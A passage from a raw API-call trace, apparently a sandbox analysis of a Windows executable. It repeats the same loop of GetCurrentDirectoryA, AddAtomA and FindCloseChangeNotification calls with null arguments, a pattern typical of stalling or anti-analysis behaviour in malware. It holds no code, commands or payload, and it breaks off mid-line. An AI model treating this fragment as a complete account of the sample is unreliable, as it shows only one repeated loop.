lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.815] AddAtomA (lpString=0x0) returned 0x0 [0043.815] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.815] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.815] AddAtomA (lpString=0x0) returned 0x0 [0043.815] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.815] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.815] AddAtomA (lpString=0x0) returned 0x0 [0043.815] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.815] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.815] AddAtomA (lpString=0x0) returned 0x0 [0043.815] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.815] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.815] AddAtomA (lpString=0x0) returned 0x0 [0043.815] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.815] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.816] AddAtomA (lpString=0x0) returned 0x0 [0043.816] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.816] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.816] AddAtomA (lpString=0x0) returned 0x0 [0043.816] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.816] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.816] AddAtomA (lpString=0x0) returned 0x0 [0043.816] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.816] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.816] AddAtomA (lpString=0x0) returned 0x0 [0043.816] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.816] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.816] AddAtomA (lpString=0x0) returned 0x0 [0043.816] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.816] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.816] AddAtomA (lpString=0x0) returned 0x0 [0043.816] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.816] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.816] AddAtomA (lpString=0x0) returned 0x0 [0043.816] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.816] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.816] AddAtomA (lpString=0x0) returned 0x0 [0043.816] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.816] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.816] AddAtomA (lpString=0x0) returned 0x0 [0043.816] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.816] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.816] AddAtomA (lpString=0x0) returned 0x0 [0043.816] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.816] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.816] AddAtomA (lpString=0x0) returned 0x0 [0043.816] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.816] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.816] AddAtomA (lpString=0x0) returned 0x0 [0043.817] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.817] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.817] AddAtomA (lpString=0x0) returned 0x0 [0043.817] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.817] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.817] AddAtomA (lpString=0x0) returned 0x0 [0043.817] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.817] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.817] AddAtomA (lpString=0x0) returned 0x0 [0043.817] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.817] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.817] AddAtomA (lpString=0x0) returned 0x0 [0043.817] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.817] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.817] AddAtomA (lpString=0x0) returned 0x0 [0043.817] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.817] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.817] AddAtomA (lpString=0x0) returned 0x0 [0043.817] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.817] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.817] AddAtomA (lpString=0x0) returned 0x0 [0043.817] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.817] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.817] AddAtomA (lpString=0x0) returned 0x0 [0043.817] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.817] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.817] AddAtomA (lpString=0x0) returned 0x0 [0043.817] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.817] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.817] AddAtomA (lpString=0x0) returned 0x0 [0043.817] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.817] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.817] AddAtomA (lpString=0x0) returned 0x0 [0043.817] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.817] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.817] AddAtomA (lpString=0x0) returned 0x0 [0043.818] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.818] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.818] AddAtomA (lpString=0x0) returned 0x0 [0043.818] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.818] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.818] AddAtomA (lpString=0x0) returned 0x0 [0043.818] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.818] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.818] AddAtomA (lpString=0x0) returned 0x0 [0043.818] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.818] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.818] AddAtomA (lpString=0x0) returned 0x0 [0043.818] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.818] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.818] AddAtomA (lpString=0x0) returned 0x0 [0043.818] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.818] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.818] AddAtomA (lpString=0x0) returned 0x0 [0043.818] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.818] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.818] AddAtomA (lpString=0x0) returned 0x0 [0043.818] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.818] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.818] AddAtomA (lpString=0x0) returned 0x0 [0043.818] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.818] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.818] AddAtomA (lpString=0x0) returned 0x0 [0043.818] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.818] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.818] AddAtomA (lpString=0x0) returned 0x0 [0043.818] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.818] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.818] AddAtomA (lpString=0x0) returned 0x0 [0043.818] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.818] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.818] AddAtomA (lpString=0x0) returned 0x0 [0043.819] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.819] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.819] AddAtomA (lpString=0x0) returned 0x0 [0043.819] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.819] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.819] AddAtomA (lpString=0x0) returned 0x0 [0043.819] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.819] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.819] AddAtomA (lpString=0x0) returned 0x0 [0043.819] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.819] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.819] AddAtomA (lpString=0x0) returned 0x0 [0043.819] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.819] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.819] AddAtomA (lpString=0x0) returned 0x0 [0043.819] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.819] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.819] AddAtomA (lpString=0x0) returned 0x0 [0043.819] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.819] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.819] AddAtomA (lpString=0x0) returned 0x0 [0043.819] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.819] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.819] AddAtomA (lpString=0x0) returned 0x0 [0043.819] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.819] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.819] AddAtomA (lpString=0x0) returned 0x0 [0043.819] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.819] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.819] AddAtomA (lpString=0x0) returned 0x0 [0043.819] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.819] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.819] AddAtomA (lpString=0x0) returned 0x0 [0043.819] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.820] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.820] AddAtomA (lpString=0x0) returned 0x0 [0043.820] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.820] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.820] AddAtomA (lpString=0x0) returned 0x0 [0043.820] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.820] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.820] AddAtomA (lpString=0x0) returned 0x0 [0043.820] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.820] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.820] AddAtomA (lpString=0x0) returned 0x0 [0043.820] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.820] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.820] AddAtomA (lpString=0x0) returned 0x0 [0043.820] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.820] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.820] AddAtomA (lpString=0x0) returned 0x0 [0043.820] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.820] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.820] AddAtomA (lpString=0x0) returned 0x0 [0043.820] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.820] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.820] AddAtomA (lpString=0x0) returned 0x0 [0043.820] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.820] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.820] AddAtomA (lpString=0x0) returned 0x0 [0043.820] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.820] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.820] AddAtomA (lpString=0x0) returned 0x0 [0043.820] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.820] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.820] AddAtomA (lpString=0x0) returned 0x0 [0043.820] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.820] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.820] AddAtomA (lpString=0x0) returned 0x0 [0043.820] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.821] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.821] AddAtomA (lpString=0x0) returned 0x0 [0043.821] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.821] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.821] AddAtomA (lpString=0x0) returned 0x0 [0043.821] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.821] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.821] AddAtomA (lpString=0x0) returned 0x0 [0043.821] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.821] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.821] AddAtomA (lpString=0x0) returned 0x0 [0043.821] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.821] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.821] AddAtomA (lpString=0x0) returned 0x0 [0043.821] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.821] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.821] AddAtomA (lpString=0x0) returned 0x0 [0043.821] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.821] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.821] AddAtomA (lpString=0x0) returned 0x0 [0043.821] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.821] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.821] AddAtomA (lpString=0x0) returned 0x0 [0043.821] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.821] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.821] AddAtomA (lpString=0x0) returned 0x0 [0043.821] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.821] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.821] AddAtomA (lpString=0x0) returned 0x0 [0043.821] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.821] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.821] AddAtomA (lpString=0x0) returned 0x0 [0043.821] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.821] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.821] AddAtomA (lpString=0x0) returned 0x0 [0043.822] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.822] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.822] AddAtomA (lpString=0x0) returned 0x0 [0043.822] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.822] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.822] AddAtomA (lpString=0x0) returned 0x0 [0043.822] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.822] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.822] AddAtomA (lpString=0x0) returned 0x0 [0043.822] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.822] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.822] AddAtomA (lpString=0x0) returned 0x0 [0043.822] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.822] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.822] AddAtomA (lpString=0x0) returned 0x0 [0043.822] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.822] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.822] AddAtomA (lpString=0x0) returned 0x0 [0043.822] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.822] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.822] AddAtomA (lpString=0x0) returned 0x0 [0043.822] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.822] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.822] AddAtomA (lpString=0x0) returned 0x0 [0043.822] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.822] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.822] AddAtomA (lpString=0x0) returned 0x0 [0043.822] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.822] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.822] AddAtomA (lpString=0x0) returned 0x0 [0043.822] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.822] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.822] AddAtomA (lpString=0x0) returned 0x0 [0043.822] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.822] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.823] AddAtomA (lpString=0x0) returned 0x0 [0043.823] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.823] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.823] AddAtomA (lpString=0x0) returned 0x0 [0043.823] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.823] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.823] AddAtomA (lpString=0x0) returned 0x0 [0043.823] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.823] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.823] AddAtomA (lpString=0x0) returned 0x0 [0043.823] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.823] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.823] AddAtomA (lpString=0x0) returned 0x0 [0043.823] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.823] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.823] AddAtomA (lpString=0x0) returned 0x0 [0043.823] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.823] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.823] AddAtomA (lpString=0x0) returned 0x0 [0043.823] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.823] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.823] AddAtomA (lpString=0x0) returned 0x0 [0043.823] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.823] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.823] AddAtomA (lpString=0x0) returned 0x0 [0043.823] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.823] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.823] AddAtomA (lpString=0x0) returned 0x0 [0043.823] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.823] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.823] AddAtomA (lpString=0x0) returned 0x0 [0043.823] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.823] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.823] AddAtomA (lpString=0x0) returned 0x0 [0043.823] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.823] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.824] AddAtomA (lpString=0x0) returned 0x0 [0043.824] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.824] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.824] AddAtomA (lpString=0x0) returned 0x0 [0043.824] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.824] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.824] AddAtomA (lpString=0x0) returned 0x0 [0043.824] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.824] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.824] AddAtomA (lpString=0x0) returned 0x0 [0043.824] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.824] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.824] AddAtomA (lpString=0x0) returned 0x0 [0043.824] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.824] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.824] AddAtomA (lpString=0x0) returned 0x0 [0043.824] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.824] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.824] AddAtomA (lpString=0x0) returned 0x0 [0043.824] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.824] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.824] AddAtomA (lpString=0x0) returned 0x0 [0043.824] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.824] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.824] AddAtomA (lpString=0x0) returned 0x0 [0043.824] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.824] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.824] AddAtomA (lpString=0x0) returned 0x0 [0043.824] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.824] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.824] AddAtomA (lpString=0x0) returned 0x0 [0043.824] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.824] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.824] AddAtomA (lpString=0x0) returned 0x0 [0043.824] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.824] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.825] AddAtomA (lpString=0x0) returned 0x0 [0043.825] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.825] GetCurrentDirectoryA (in: 